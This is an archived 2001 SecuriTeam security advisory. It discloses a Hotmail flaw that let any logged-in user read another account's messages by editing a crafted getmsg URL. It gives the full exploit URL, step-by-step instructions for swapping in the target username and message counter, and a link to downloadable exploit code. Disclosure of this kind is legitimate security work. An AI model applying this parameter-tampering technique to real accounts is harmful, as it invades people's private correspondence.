[NEWS] Viewing Someone's Hotmail Account in Three Easy Steps
From: support@securiteam.comDate: 08/22/01
- Previous message: support@securiteam.com: "[NT] Microsoft Releases Two Security Tools"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [NEWS] Viewing Someone's Hotmail Account in Three Easy Steps Message-Id: <20010822052205.5DBFF138BF@mail.der-keiler.de> Date: Wed, 22 Aug 2001 07:22:05 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Viewing Someone's Hotmail Account in Three Easy Steps
------------------------------------------------------------------------
SUMMARY
A bug in Hotmail allows users that know just the username of other people,
to read their target's emails by simply accessing a specially crafted URL.
DETAILS
To view full email from some else's account do the following:
1. Login normally to Hotmail with your ID (any id)
2. Use this type of link to view specific message from specific user:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e
36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702
%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26d
omain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
(NOTE: The above URL has been wrapped)
Or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2
e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d970
2%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26
domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
(NOTE: The above URL has been wrapped)
From that link change values:
MSG943322803%2e16 (Message id number, it is simply a counter.)
username (Hotmail account name to view)
(Remove "%26raw%3d0" if you want to view email as 'emailbox view', instead
of full raw view.)
(Remove "&hm___fl=attrd&domain=hotmail.com" if you do not like the hotmail
frame on top.)
3. Done. If you entered a correct message number and username, you will
view it. (Test it with your own other hotmail account messages first to
get the idea working.)
Exploit code (Visual Basic code):
An exploit code can be downloaded from:
<http://www.root-core.com/> http://www.root-core.com/ (Web site link)
<http://rootcore.can-host.com/files/hobo04r2.zip>
http://rootcore.can-host.com/files/hobo04r2.zip (Direct link)
ADDITIONAL INFORMATION
The information has been provided by <mailto:root@root-core.com>
[Digital-Vortex].
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Microsoft Releases Two Security Tools"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
